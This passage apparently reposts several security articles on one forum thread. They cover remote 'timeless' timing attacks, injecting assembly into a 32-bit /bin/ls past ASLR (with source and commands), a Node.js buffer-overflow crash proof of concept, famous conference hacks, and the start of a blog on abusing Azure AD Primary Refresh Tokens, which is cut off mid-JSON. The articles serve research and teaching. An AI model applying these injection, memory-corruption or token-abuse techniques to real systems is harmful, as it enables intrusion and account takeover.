needed. This allows an attacker to detect differences in execution time as small as 100ns,” Van Goethem says. The smallest timing difference that the researchers had observed in a traditional timing attack over the internet was 10μs, 100 times higher than the concurrent request-based attack. How to ensure concurrency “The way we ensure [concurrency] is indeed by ensuring that both requests are placed in a single network packet,” Van Goethem says, adding, “How it works exactly in practice mainly depends on the network protocol.” To send concurrent requests, the researchers exploit capabilities in different network protocols. For instance, HTTP/2, which is fast becoming the de-facto standard in web servers, supports ‘request multiplexing’, a feature that allows a client to send multiple requests in parallel over a single TCP connection. “[For HTTP/2], we just need to make sure that both requests are placed in a single packet (e.g. by writing both to the socket at once),” Van Goethem explains. There are some caveats, however. For example, most content delivery networks such as Cloudflare, which powers a large portion of the web, the connection between the edge servers and the origin site is over HTTP/1.1, which does not support request multiplexing. Read more of the latest cybersecurity research news Although this decreases the effectiveness of the timeless attack, it is still more precise than classing remote timing attacks because it removes the jitter between the attacker and the CDN edge server. For protocols that do not support request multiplexing, the attackers can use an intermediate network protocol that encapsulates requests. The researchers go on to show how timeless timing attacks work on the Tor network. In this case, the attackers encapsulate multiple requests in a Tor cell, the packet that is encrypted and passed on between nodes in the Tor network in single TCP packets. “Because the Tor circuit for onion services goes all the way to the server, we can ensure that the requests will arrive at the same time,” Van Goethem says. Timeless attacks in practice In their paper, the security researchers explore timeless attacks in three different settings. In direct timing attacks, the malicious actor directly connects to the server and tries to leak secret, application-specific information. “As most web applications are not written with the idea in mind that timing attacks can be highly practical and accurate, we believe many websites are susceptible to timing attacks,” Van Goethem says. In cross-site scripting attacks, the attacker triggers requests to other websites from a victim’s browser and infers private information by observing the sequence of responses. The attackers used this scheme to exploit a vulnerability in the HackerOne bug bounty programme and extract information such as keywords used in private reports about unfixed vulnerabilities. “I looked for cases where a timing attack was previously reported but was not considered effective,” Van Goethem says. RECOMMENDED Hide and replace: ‘Shadow Attacks’ can manipulate contents of signed PDF docs “In case of the HackerOne bug, it was already reported at least three times (bug IDs #350432, #348168, and #4701), but was not fixed, as the attack was considered infeasible to exploit. I then created a basic PoC with the timeless timing attacks. “At that time, it was still highly unoptimized as we were still figuring out the details of the attack, but nevertheless it seemed to be quite accurate (on my home WiFi connection, I managed to get very accurate results).” The researchers also tried timeless attacks on the WPA3 WiFi protocol. Mathy Vanhoef, one of the co-authors of the paper, had previously discovered a potential timing leak in WPA3’s handshake protocol. But the timing was either too small to exploit on high-performance devices or could not be exploited against servers. “With the new timeless timing attacks, we show that it is in fact possible to exploit the WiFi authentication handshake (EAP-pwd) against servers, even if they use performant hardware,” Van Goethem says. Perfect timing In their paper, the researchers provide guidelines to protect servers against timeless attacks such as setting constant-time and random padding constraints on execution time. Practical, low-impact defenses against direct timing attacks require further research. “We believe that this line of research is still in the early stages, and much is yet to be explored,” Van Goethem said. Future research directions could include exploring other techniques that could be used to perform concurrent timing attacks, other protocols and intermediate network layers that can be targeted, and assessing the vulnerability of popular websites that allow such testing under a bug bounty. The name “timeless” was chosen “because in the attacks we do not use any (absolute) timing information,” Van Goethem said. “‘Timeless’ is also a play on the idea that (remote) timing attacks have been around for quite a while, and based on our findings, they will likely only get worse and are here to stay.” YOU MIGHT ALSO LIKE Blind regex injection: Theoretical exploit offers new means of forcing web apps to spill secrets Hacking Techniques Research Vulnerabilities Network Security Privacy Encryption Hacking News XSS Belgium Europe Middle East Mobile Bug Bounty Ben Dickson @bendee983 Sursa: https://portswigger.net/daily-swig/researchers-exploit-http-2-wpa3-protocols-to-stage-highly-efficient-timeless-timing-attacks
  19. Injecting code into 32bit binary with ASLR Porting the example from "Practical binary Analysis" book to a more general case Disclamer: I am currently reading PBA book, so this refers to the content presented there. The code can nonetheless be obtained freely. This "article" started mostly as personal notes, which I have decided to publish since I think it could help people starting in this field. I will assume you are reading/own the book and therefore you can reference this content with that. Introduction The book illustrates various method to inject assembly code into an ELF file. It also provides a small tool (elfinject.c) to automatize the process. In particular we will use the "primary" method, meaning overwriting an existing section header that is not fundamental for the ELF correct execution (in our case .note.ABI-tag), and the corresponding part in the program header. The objective is to inject a simple "Hello word" into /bin/ls, without breaking it (meaning that ls should keep working as expected). For more details you should read the book. Since I am assuming that this method has already been presented many times - and in better ways -, the concept of this (and what might be useful) is to show you the thoughts that lead to resolve the problem. The problem The book presents already a tool called elfinject.c, which automatize the task. Peeking at the source code, it should also work on 32bit elf files. But, as in most of articles, the example provided did not take into consideration ASLR. Furthermore, the assembly code is for x64 architecture. I will assume zero knowledge about ASLR presence and functionality. The machine I am working with is a virtualized Ubuntu (not the one used for the book), with default configuration, and no safety measure turned off. michele@michele-VirtualBox:~/pba/code/chapter7$ uname -a Linux michele-VirtualBox 4.15.0-111-generic #112-Ubuntu SMP Thu Jul 9 20:36:22 UTC 2020 i686 i686 i686 GNU/Linux Obviously, just running the example does not work. The first problem we have to face is the wrong assembly code. The provided hello word.s is the following: BITS 64 SECTION .text global main main: push rax ; save all clobbered registers push rcx ; (rcx and r11 destroyed by kernel) push rdx push rsi push rdi push r11 mov rax,1 ; sys_write mov rdi,1 ; stdout lea rsi,[rel $+hello-$] ; hello mov rdx,[rel $+len-$] ; len syscall pop r11 pop rdi pop rsi pop rdx pop rcx pop rax push 0x4049a0 ; jump to original entry point ret hello: db "hello world",33,10 len : dd 13 The solution Here's my 32bit version of the hello world assembly file: BITS 32 SECTION .text global main main: push ecx push edx push esi push edi mov ebx,1 ; stdout ARG0 for x86 32bit mov ecx, [esp] lea ecx, [ecx + hello] mov edx, [esp] mov edx, [edx + len] mov eax,4 int 0x80 mov eax, [esp] sub eax, 0x411772 pop edi pop esi pop edx pop ecx jmp eax hello: db "hello world",33,10 len : dd 13 Let's take a look at the new hello32.s, it starts with BITS 32, this is the obvious first change. The next change is in the registers saved: push ecx push edx push esi push edi Indeed, x86 32bit does not have the 64bit registers, (no r**) and neither r** (more info about registers). I don't save the eax and this will be clear later why. The second important problem was the interrupt call. x86 does not use syscall, so I had to use int 0x80. This also requires a different way to: 1. provide the arguments 2. choose the number of the system call (with respect to the x64 example). We cannot simply replace the 64bit registers with their 32bit part, because the order used is different (order). Furthermore, the call associated with write is not 1 but 4 (syscall list). Another issue was regarding the address of strings. Simply porting the code provided did not work, because the memory pointed to (- for example for the string hello -) was not being updated, or corretly referenced relatively to the address. So to reference it correcty, I had to use a little trick: mov ecx, [esp] lea ecx, [ecx + hello] mov edx, [esp] mov edx, [edx + len] This make sure that at runtime the address for the string and the size is correct, no matter how we modify the source. Another issue encountered was the presence of ASLR. As I said, I will assume zero knowledge about it, and how to work around it. Reading ls headers with readelf, it prints it as a a shared object: michele@michele-VirtualBox:~/pba/code/chapter7$ readelf /bin/ls -h Intestazione ELF: Magic: 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 Classe: ELF32 Dati: complemento a 2, little endian Versione: 1 (current) SO/ABI: UNIX - System V Versione ABI: 0 Tipo: DYN (file oggetto condiviso) After a bit of exploration, we can see that the addresses shown by readelf (e.g. the entry point), and the actual loaded in memory, are different. This can be quite annoying for debugging. … Indirizzo punto d'ingresso: 0xfad … This address does not correspond to the real virtual address of the entry point. We can verify it with gdb: ... (gdb) b *0xfad Breakpoint 1 at 0xfad (gdb) r Starting program: /bin/ls Warning: Cannot insert breakpoint 1. Cannot access memory at address 0xfad Luckily for us, after having run the binary we can obtain the real address: (gdb) info file Symbols from "/bin/ls". Native process: Using the running image of child process 14081. While running this, GDB does not access memory from... Local exec file: `/bin/ls', file type elf32-i386. Entry point: 0x403f86 At this point, one could think that doing a jmp to 0x403f86 (at the end of our assembly code) would work: push 0x403f86 Ret Unfortunately it works only with gdb, but crashes running it from the terminal. We can speculate that the address handling might be different in these two contex. So we might wanted to obtain a relative jump from the position of the code, to the original entry point, assuming this distance is fixed. We can find the distance debugging it, and then we can implement a relative jump, with a similar method as for the data addresses: mov eax, [esp] sub eax, 0x411772 ... jmp eax An important thing to keep in mind is to do the pop after you used the [esp] value, because otherwise addressing [esp] does not provide the correct address. After all these modification, we are finally able to inject and run from the terminal. After having copied /bin/ls to ls_mod, we compile the assembler file with -f bin flag, and we inject it. nasm -f bin hello32.s -o hello32.bin ./elfinject ls_mod hello32.bin ".injected" 0x00415180 0 michele@michele-VirtualBox:~/pba/code/chapter7$ ./ls_mod hello world! elfinject heapoverflow.c hello-ctor.s hello-got.s new_headers shell.c elfinject.c hello32.bin hello_fixed2_32.bin hello.s original_headers encrypted hello.bin hello_fixed32.bin ls_mod shell_asm.bin heapcheck.c hello-ctor.bin hello-got.bin Makefile shell_asm.s As we can see, running our injected binary provides both the Hello World, and its normal output. More resources - what is going on? What is happening is that due to ASLR, the addresses are being randomized. You can find more details here. Debugging the binary with dbg disables ASLR. This is why we always get the same "original" entry point with gdb, and also why the injection would work without a relative jump. ASLR can be re-enabled in gdb with set disable-randomization off. The binary was listed as shared object, because comping with ASLR enabled results in a PIE (Position-Independent Executable) binary. Sursa: https://www.michelemarazzi.com/elfinjection.html
  20. Reverse Engineering iOS Applications Welcome to my course Reverse Engineering iOS Applications. If you're here it means that you share my interest for application security and exploitation on iOS. Or maybe you just clicked the wrong link 😂 All the vulnerabilities that I'll show you here are real, they've been found in production applications by security researchers, including myself, as part of bug bounty programs or just regular research. One of the reasons why you don't often see writeups with these types of vulnerabilities is because most of the companies prohibit the publication of such content. We've helped these companies by reporting them these issues and we've been rewarded with bounties for that, but no one other than the researcher(s) and the company's engineering team will learn from those experiences. This is part of the reason I decided to create this course, by creating a fake iOS application that contains all the vulnerabilities I've encountered in my own research or in the very few publications from other researchers. Even though there are already some projects[^1] aimed to teach you common issues on iOS applications, I felt like we needed one that showed the kind of vulnerabilities we've seen on applications downloaded from the App Store. This course is divided in 5 modules that will take you from zero to reversing production applications on the Apple App Store. Every module is intended to explain a single part of the process in a series of step-by-step instructions that should guide you all the way to success. This is my first attempt to creating an online course so bear with me if it's not the best. I love feedback and even if you absolutely hate it, let me know; but hopefully you'll enjoy this ride and you'll get to learn something new. Yes, I'm a n00b! If you find typos, mistakes or plain wrong concepts please be kind and tell me so that I can fix them and we all get to learn! Version: 1.1 Modules Prerequisites Introduction Module 1 - Environment Setup Module 2 - Decrypting iOS Applications Module 3 - Static Analysis Module 4 - Dynamic Analysis and Hacking Module 5 - Binary Patching Final Thoughts Resources EPUB Download Thanks to natalia-osa's brilliant idea, there's now a .epub version of the course that you can download from here. As Natalia mentioned, this is for easier consumption of the content. Thanks again for this fantastic idea, Natalia 🙏🏼. License Copyright 2019 Ivan Rodriguez <ios [at] ivrodriguez.com> Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. Donations I don't really accept donations because I do this to share what I learn with the community. If you want to support me just re-share this content and help reach more people. I also have an online store (nullswag.com) with cool clothing thingies if you want to get something there. Disclaimer I created this course on my own and it doesn't reflect the views of my employer, all the comments and opinions are my own. Disclaimer of Damages Use of this course or material is, at all times, "at your own risk." If you are dissatisfied with any aspect of the course, any of these terms and conditions or any other policies, your only remedy is to discontinue the use of the course. In no event shall I, the course, or its suppliers, be liable to any user or third party, for any damages whatsoever resulting from the use or inability to use this course or the material upon this site, whether based on warranty, contract, tort, or any other legal theory, and whether or not the website is advised of the possibility of such damages. Use any software and techniques described in this course, at all times, "at your own risk", I'm not responsible for any losses, damages, or liabilities arising out of or related to this course. In no event will I be liable for any indirect, special, punitive, exemplary, incidental or consequential damages. this limitation will apply regardless of whether or not the other party has been advised of the possibility of such damages. Privacy I'm not personally collecting any information. Since this entire course is hosted on Github, that's the privacy policy you want to read. [^1] I love the work @prateekg147 did with DIVA and OWASP did with iGoat. They are great tools to start learning the internals of an iOS application and some of the bugs developers have introduced in the past, but I think many of the issues shown there are just theoretical or impractical and can be compared to a "self-hack". It's like looking at the source code of a webpage in a web browser, you get to understand the static code (HTML/Javascript) of the website but any modifications you make won't affect other users. I wanted to show vulnerabilities that can harm the company who created the application or its end users. Sursa: https://github.com/ivRodriguezCA/RE-iOS-Apps
  21. Discovering Buffer overflows in NodeJS core Firo Solutions Jul 30 · 3 min read Summary Nodejs is a relatively new candidate in the programming world. It allows JavaScript(which is normally only executed and used in web browsers) to be executed outside the browser. A popular example of an application that is currently using Nodejs is the programming framework Electron which is used by WhatsApp, Twitch, Microsoft Teams, Slack, Discord and several other applications, even NASA is using nodejs to export data from the Extravehicular activity aka eva spacesuits. A security researcher by the name of Tobias Nießen discovered a Buffer overflow vulnerability in several of Nodejs built-in functions. CVE-2020–8174 On Jan 27th 2020, Tobias noticed that Nodejs napi_get_value_string_latin1, napi_get_value_string_utf8, napi_get_value_string_utf16 functions was not properly handling the input data resulting in memory corruption. He quickly reported it using Nodejs public bug bounty program and was rewarded with 250 USD by the Internet Bug Bounty for his discoveries. The internet bug bounty is an organization that hands out various bounties to security researcher when a security vulnerability is found in a piece of software code that is used by a larger amount of people, in order to make the internet a more secure place. A day later the discovered vulnerabilities were reported and gained the Common Vulnerability and Exposure id of CVE-2020–8174. The dangers of exploitation Buffer overflows are very common software vulnerabilities that in many cases lead to security holes in a program that a third party could use to corrupt memory and manipulate the program to execute malicious code. Tobias describes the vulnerability as: 1, If the output pointer is NULL, return. 2, Write min(string_length, bufsize - 1) bytes to the output buffer. Note that bufsize is an unsigned type, so this leads to an integer underflow for bufsize == 0. Since this is a size_t, the underflow will cause the entire string to be written to memory, no matter how long the string is. 3, Finally, write to buf[copied], where copied is the number of bytes previously written. Even if step 2 hadn't written out of bounds, this would (for bufsize == 0). Security advisory The OpenJS foundation which is the responsible legal entity behind Nodejs published a security advisory in June 2020 acknowledging Tobias’s findings as a high severity vulnerability, “napi_get_valuestring() allows various kinds of memory corruption (High) (CVE-2020–8174)“. Advising everyone to upgrade their nodejs instances, because versions 10.x, 12.x, and 14.x of Nodejs contains the vulnerable functions. No one has yet published a piece of code to exploit this vulnerability as of writing this. A proof of concept exploit is likely going to be developed and perhaps come out publicly or remain private. Since Nodejs is being used by a large chunk of software the demand for dangerous software exploits. A Crash proof of consept is provided by the author: Napi::Value Test(const Napi::CallbackInfo& info) { char buf[1]; // This should be a valid call, e.g., due to a malloc(0). napi_get_value_string_latin1(info.Env(), info[0], buf, 0, nullptr); return info.Env().Undefined(); }const binding = require('bindings')('validation'); console.log(binding.test('this could be code that might later be executed')); What can you do? Update all your nodejs instances to run the latest version which you can find at https://nodejs.org/en/. Read the original and more: https://blog.firosolutions.com/exploits/hacking-nodejs/ Written by Firo Solutions Sursa: https://medium.com/@social_62682/discovering-buffer-overflows-in-nodejs-core-b4af76c00bba
  22. Omer Yair - ROP - From Zero to Nation State In 25 Minutes
  23. 11 top DEF CON and Black Hat talks of all time Hacker summer camp is almost upon us again. Here are some of the best talks of all time. Will this year's virtual talks measure up to these legends? By J.M. Porup and Lucian Constantin CSO | Jul 21, 2020 3:00 am PDT BeeBright / Getty Images white papers Surviving the cyber security storm Prepare for the Fourth Industrial Revolution How Mature is Your Cloud? Since 1997, the Black Hat and DEF CON events have gained a reputation for presenting some of the most cutting-edge research in information security. The events have also had their share of controversy – sometimes enough to cause last-minute cancelations. For example, Chris Paget was forced to cancel his Black Hat RFID for Beginners talk in 2007 under threat of litigation from secure card maker HID Corp. [ Get inside the mind of a hacker, learn their motives and their malware. | Sign up for CSO newsletters! ] Launched as a single conference in 1997, Black Hat has gone international with annual events in the U.S., Europe and Asia. This year’s virtual U.S. event begins August 1 with four days of technical training, followed by the two-day main conference. DEF CON began in 1992 and also takes place virtually from August 6 to 9. CSO looks at some of the past Black Hat and DEF CON highlights. 1. The Jeep hack Who can forget 0xcharlie's hack of a Jeep--with WIRED reporter Andy Greenberg inside? Security researchers Charlie Miller and Chris Valasek presented their findings at Black Hat 2015, and showed how they remotely hacked a jeep and took control of the vehicle, including the transmission, accelerator and brakes. Their previous research had focused on an attack that required physical access to the targeted vehicle, results that auto manufacturers pooh-poohed. The remote, wireless attack, however, made everyone sit up and take notice. 2. Steal everything, kill everybody Jayson E. Street's famous DEF CON 19 talk on social engineering, and how he is able to walk into anywhere and could "steal everything, kill everybody" if he wanted to is a perennial favorite talk even all these years later. Who cares if your enterprise is compliant if a random dude in a janitor's uniform comes in and pulls the plug on your business? Street bluntly lays out the secure sites he's talked his way into, what he could have done, and hammers home the need for defense in depth against social engineering attacks. 3. Hacking driverless vehicles Seems inevitable, right? But sometimes you need a proof of concept to drive the point home (pun intended), and security researcher Zoz did just that at DEF CON 21 with his talk "Hacking driverless vehicles". While driverless vehicles hold the potential to reduce traffic fatalities--turns out humans are really bad drivers--they also introduce new, catastrophic risk that is less likely but far more severe in impact. "With this talk Zoz aims to both inspire unmanned vehicle fans to think about robustness to adversarial and malicious scenarios, and to give the paranoid false hope of resisting the robot revolution," the talk description says, and the scary thing is not much has changed since he delivered his talk in 2013. 4. Barnaby Jack and ATMs RIP Barnaby Jack. The late, great hacker and showman made ATMs spit cash all over a stage in 2010 and will always be remembered for his exploits, and his untimely death just weeks before yet another blockbuster Vegas talk on medical device security. In the finest tradition of security research, Jack sought to provoke manufacturers to improve the security posture of their devices. The New Zealander was living in San Francisco when he died of a drug overdose, sparking conspiracy theories among some in the hacker community. Recommended Whitepapers 5 best practices for transitioning from legacy voice to VoIP and UC&C 20 Patterns to Watch for in Your Engineering Team 5 Traits of Wildy Successful Tech Companies 5. Back Orifice Cult of the Dead Cow has been much in the news of late, and their Back Orifice talk at DEF CON in 1999 was a classic--and one that's been getting renewed attention due to Joseph Menn's new book, "Cult of the Dead Cow," that traces the history of that hacking group. Back Orifice was a malware proof of concept designed to backdoor enterprise Windows 2000 systems. Their motive? To force Microsoft to acknowledge the rampant insecurities in their operating systems. One can trace a direct line from provocations like Back Orifice to the famous 2002 Bill Gates memo on trustworthy computing, when the then-CEO of Microsoft laid out security as job #1 going forward for Microsoft. 6. Blue Pill Joanna Rutkowska's legendary talk on subverting hypervisor security is one for the history books. Named after the Matrix "blue pill"--a drug that makes the fake world look real--the Blue Pill exploit made quite the splash at Black Hat 2006. "The idea behind Blue Pill is simple: Your operating system swallows the Blue Pill and it awakes inside the Matrix controlled by the ultra-thin Blue Pill hypervisor," Rutkowska wrote at the time. "This all happens on-the-fly (i.e., without restarting the system) and there is no performance penalty and all the devices, like graphics card, are fully accessible to the operating system, which is now executing inside virtual machine." Since then, Rutkowska has turned her offensive genius to play defense, and launched the high security Qubes operating system, a hardened Xen distribution for laptops. 7. Bluesnarfing and the BlueSniper rifle While modern smartphones are minicomputers that use a range of wireless protocols, including WiFi, to transfer data, 2004 was very much still the age of feature phones. The first iPhone wouldn't come out for another three years. Back in those days, the most popular wireless data transfer technology on cell phones was Bluetooth, and while it didn't have great security and people often left it open, the phone manufacturers of the day believed the risk of attack to be low because Bluetooth is a short-range protocol. That argument was again brought up when researchers Adam Laurie and Martin Herfurt demonstrated several vulnerabilities and attacks against Bluetooth implementations at the Black Hat and DEF CON conferences in 2004 that could allow attackers to turn phones into listening devices or to download agenda, calendar appointments or text messages from phones without authorization. They dubbed their attacks bluebugging and bluesnarfing. A researcher named John Hering then took the threat to another level by demonstrating the feasibility of Bluetooth-based attacks from over a mile away using a device equipped with a semi-directional antenna that resembled a rifle. The BlueSniper rifle was born. 8. The Kaminsky bug In 2008, security researcher Dan Kaminsky discovered a fundamental flaw in the Domain Name System (DNS) protocol that affected the most widely used DNS server software. The flaw allowed attackers to poison the cache of DNS servers used by telecommunications providers and large organizations and force them to return rogue responses to DNS queries. This enabled website spoofing, email interception and a range of other attacks. With DNS being one of the core internet protocols, the bug triggered one of the biggest coordinated patching efforts in history. It also sped up the adoption and deployment of the Domain Name System Security Extensions (DNSSEC), which add digital signatures to DNS records. Since 2010 Kaminsky has been one of the seven DNSSEC Recovery Key Share Holders, people from around the world whose individual keys are needed in the recovery process for the DNSSEC root key in case it's lost in a catastrophe. The DNS cache poisoning bug was announced in July 2018 and Dan Kamisky presented further details about it at the Black Hat USA and DEF CON 16 conference the next month. 9. From phpwn to "How I Met Your Girlfriend" In 2010, security researcher and hacker Samy Kamkar built a program called phpwn that exploited a bug in the pseudorandom number generator of the PHP programming language. PHP is the most widely used web-based programming language in the world and random numbers are critical to any cryptographic operation. In particular, Kamkar's phpwn demonstrated that the session IDs produced by PHP's LCG (linear congruential generator) -- a pseudorandom number generator -- could be predicted with sufficient accuracy to allow session hijacking. Websites use session IDs stored inside cookies to track and automatically authenticate logged in users. Kamkar, who is also known as the creator of the Samy cross-site scripting worm that took down MySpace in 2005, demonstrated the phpwn attack as part of a larger presentation at DEF CON 18 called "How I Met Your Girlfriend" where he showed several techniques and exploits on how to track people online, including finding out their geolocation. 10. The Cavalry Isn't Coming After several years of presentations of serious vulnerabilities in hardware devices that can directly impact human life and safety, like those used in homes, cars, medical services and public infrastructure, researchers Josh Corman and Nick Percoco raised the alarm in a talk at DEF CON 21 entitled "The Cavalry Isn't Coming." The talk served as the official launch of the I Am the Cavalry movement, whose goal was to get hackers and security experts in the same room with device manufacturers, industry groups and regulators to better inform them about cybersecurity risk and how to eliminate them from critical devices. Over the following years, the I Am the Cavalry cyber-safety grassroots organization has been credited with helping automotive and medical device manufacturers launch bug bounty and vulnerability coordination programs, as well as advising the U.S. Congress and the U.S. Food and Drug Administration and other regulatory bodies on both sides of the Atlantic. The group continues to bridge the cultural and cybersecurity knowledge gap between hackers and decision makers. 11. BadUSB Malware delivered via USB drives has been around for a very long time. The Stuxnet cybersabotage attack used against Iran launched malware from USB drives using a zero-day Windows vulnerability. However, at Black Hat in 2014, German researchers Karsten Nohl and Jakob Lell presented a new form of attack involving USB drives that is almost impossible to detect or prevent without blocking a computer's USB ports completely. Dubbed BadUSB, their attack exploits the lack of firmware security in widely used USB controllers to reprogram thumb drives and make them emulate other functionalities and device types--for example a keyboard that can automatically send rogue commands and execute a malicious payload. By design, the USB protocol allows for one device to have multiple functionalities and behave like multiple devices, so this attack takes advantage of a design decision and cannot be blocked. BadUSB drastically increases the security risks associated with inserting unknown USB devices into computers or even handing out a USB thumb drive to a friend and trusting it after being plugged into their machine. That's because BadUSB can also be turned into a worm. A computer compromised through a malicious thumb drive can reprogram clean USB thumb drives inserted into them and transform them into carriers. Sursa: https://www.csoonline.com/article/3411796/11-top-def-con-and-black-hat-talks-of-all-time.html
  24. Abusing Azure AD SSO with the Primary Refresh Token 20 minute read Modern corporate environments often don’t solely exist of an on-prem Active Directory. A hybrid setup, where devices are joined to both on-prem AD and Azure AD, or a set-up where they are only joined to Azure AD is getting more common. These hybrid set-ups offer multiple advantages, one of which is the ability to use Single Sign On (SSO) against both on-prem and Azure AD connected resources. To enable this, devices possess a Primary Refresh Token which is a long-term token that is stored on the device, where possible using a TPM for extra security. This blog explains how SSO works with the Primary Refresh Tokens, and what some of the implicit risks are of using SSO. I’ll also demonstrate how attackers can abuse this if they have access to a device which is Azure AD joined or Hybrid joined, to obtain long-lived tokens which can be used independently of the device and which will in most cases comply with even the stricter Conditional Access policies. A tool to abuse this and the capabilities to use this with ROADtools are present towards the end of this blog, as well as considerations for defenders. Hybrid whut? The attacks described in this blog only work on devices that are joined to Azure AD, or joined to both Azure AD and Windows Server Active Directory. In the last case it’s called a Hybrid Azure AD joined device, because it is joined to both directories. The concept of Azure AD joined devices is described pretty well in the Microsoft Device Identity documentation. Hybrid environments come in different flavours, mostly depending on whether the company uses Federation for authentication (such as ADFS, where all authentication takes place on-premises) or uses a Managed Azure AD domain (where authentication takes place on Microsoft’s servers using Password Hash Synchronization or Pass-through Authentication). In this blog I’ll use the most common scenario, where the on-prem domain is synced to Azure AD with Password Hash Synchronization through Azure AD connect. To make things easier, both the on-prem domain and the Azure AD domain use the same publicly routable domain name. In this scenario, the hybrid join is established as follows: The device is joined to on-prem AD and a computer account is created in the directory. Azure AD connect detects the new account and syncs the computer account to Azure AD, where a device object is created. The device detects that hybrid join is enabled via the Service Connection Point in LDAP, which contains the domain name and tenant ID. The device uses it’s certificate, of which the public part is stored in AD and synced to Azure AD, to prove it’s identity to Azure AD and register itself. Some private keys are generated and certificates are exchanged which establish a trust between the device and Azure AD. The device is now registered in both Azure AD and the on-prem AD, and can interact with both using the various cryptographic certificates and keys that were previously exchanged. To identify the state of a device, the dsregcmd utility can be used. A hybrid device will be joined to both Azure AD and to a domain: Primary Refresh Tokens (PRT) A Primary Refresh Token can be compared to a long-term persistent Ticket Granting Ticket (TGT) in Active Directory. It is a token that enables users to sign in once on their Azure AD connected device and then automatically sign in to Azure AD connected resources. To understand this PRT, let’s have a look first at what a PRT is and how it is secured. In OAuth2 terminology, a refresh token is a long lived token that can be used to request new access tokens, which are then sent to the service you want to authenticate to. A regular refresh token is issued when a user is signed in to an application, website or mobile app (which are all applications in Azure AD terminology). This refresh token is only valid for the user that requested it, only has access to what that application is granted access to and can only be used to request access tokens for that same application. The Primary Refresh Token however can be used to authenticate to any application, and is thus even more valuable. This is why Microsoft has applied extra protection to this token. The most important protection is that on devices with a TPM, the cryptographic keys are stored within that TPM, making it under most circumstances not possible to recover the actual keys from the OS itself. There is some quite extensive documentation about the Primary Refresh Token available here. I do suggest you read the whole article as it has quite some technical details, but for the purpose of this post, here are the most important points: If a TPM is present, the keys required to request or use the PRT are protected by the TPM and can’t be extracted under normal circumstances. A PRT can get updated with an MFA claim when MFA is used on the device, which enables SSO to resources requiring MFA afterwards. The PRT contains the device ID and is thus tied to the device object in Azure AD, this can be used to match the tokens against Conditional Access policies requiring compliant devices. The PRT is invalidated when the device is disabled in Azure AD and can’t be used any more to request new tokens at that point. During SSO the PRT is used to request refresh and access tokens. The refresh tokens are kept by the CloudAP plug-in and encrypted with DPAPI, the access tokens are passed to the requesting application. Something to note on this is that quite a few of these protections use the TPM, which is optional in a Hybrid join. If there is no TPM the keys are stored in software. In this scenario it is possible to recover them from the OS with the right privileges, there just is no tooling for this at the moment (but I expect there will be in the future). Another thing of note that warrants further research is the Session key which is mentioned several times throughout the PRT documentation, which is decrypted using the transport key and then stored into the TPM. Unless this is a single step taking place entirely within the TPM, this could provide a brief window in which the session key is unencrypted in memory, at which point it could be intercepted by an attacker already on the system. The number of opportunities to intercept this key could increase if the session key is renewed or changed at certain points in time. I haven’t researched this so maybe my thought process here is completely incorrect, but it’s once again an interesting avenue for future research. Anyway, let’s go back to the main topic… Single Sign On As described in the PRT documentation, the PRT enables single sign-on to Azure AD resources. In Edge this is done natively (as expected), but Chrome does not do this natively, it uses a Chrome extension from Microsoft to enable this capability. At this point it’s probably good to note that Lee Christensen was researching this around the same time as I was and wrote a blog about it just a bit earlier. As my approach on this was slightly different than Lee’s, I figured there is still value in describing the process, but if you’re already familiar with Lee’s blog on this feel free to skip to the next section. Interaction with the PRT from Chrome Let’s start with the Chrome extension that Microsoft provides for SSO on Windows 10. Once the extension is installed and you browse to an Azure AD connected application such as office.com, the sign-in process doesn’t prompt for anything but just continues straight to your account. Since Chrome extensions are written in JavaScript, you can just load the code in your favourite editor. For reference, the extensions are saved in C:\Users\youruser\AppData\Local\Google\Chrome\User Data\Default\Extensions. In its manifest, the permission nativeMessaging is declared, with the background.js script indeed using the sendNativeMessage function to the com.microsoft.browsercore namespace. According to the documentation this requires a registry key in HKCU\Software\Google\Chrome\NativeMessagingHosts, which is indeed present for the com.microsoft.browsercore name we saw in the extension. It points us to C:\Windows\BrowserCore\manifest.json, which contains a reference to which extensions are allowed to call the BrowserCore.exe binary. Note that C:\Windows\BrowserCore is the location in recent insider builds of Windows 10, in older versions it is located in C:\Program Files\Windows Security\BrowserCore. And the manifest.json: { "name": "com.microsoft.browsercore", "description": "BrowserCore", "path": "BrowserCore.exe", "type": "stdio", "allowed_origins": [ "chrome-extension://ppnbnpeolgkicgegkbkbjmhlideopiji/", "chrome-extension://ndjpnladcallmjemlbaebfadecfhkepb/" ] } To see what is sent to this process, I signed in a couple of times while Process Monitor from Sysinternals was running, which captured the process command line: C:\Windows\system32\cmd.exe /d /c "C:\Windows\BrowserCore\BrowserCore.exe" chrome-extension://ppnbnpeolgkicgegkbkbjmhlideopiji/ --parent-window=0 < \\.\pipe\chrome.nativeMessaging.in.720bfd13d22dec77 > \\.\pipe\chrome.nativeMessaging.out.720bfd13d22dec77 As we see Chrome is using named pipes to feed information to stdin and another pipe to read stdout. I figured the best way to see what is sent over these named pipes was to try and intercept or monitor the traffic. I couldn’t find an open source tool that easily allowed monitoring of named pipes, so I had to opt for the commercial Pipe Monitor from IO Ninja (they do offer an evaluation version which I used for this). This worked pretty well and after clearing the cookies and signing back in to Office.com I saw the named pipe communication show up: As already mentioned in the nativeMessaging documentation, the first few bytes are the total length of the message and the rest is the data (in JSON) transferred to the native component. The JSON is as follows: { "method":"GetCookies", "uri":"https://login.microsoftonline.com/common/oauth2/authorize?client_id=4345a7b9-9a63-4910-a426-35363201d503&redirect_uri=https%3<cut>ANDARD2_0&x-client-ver=", 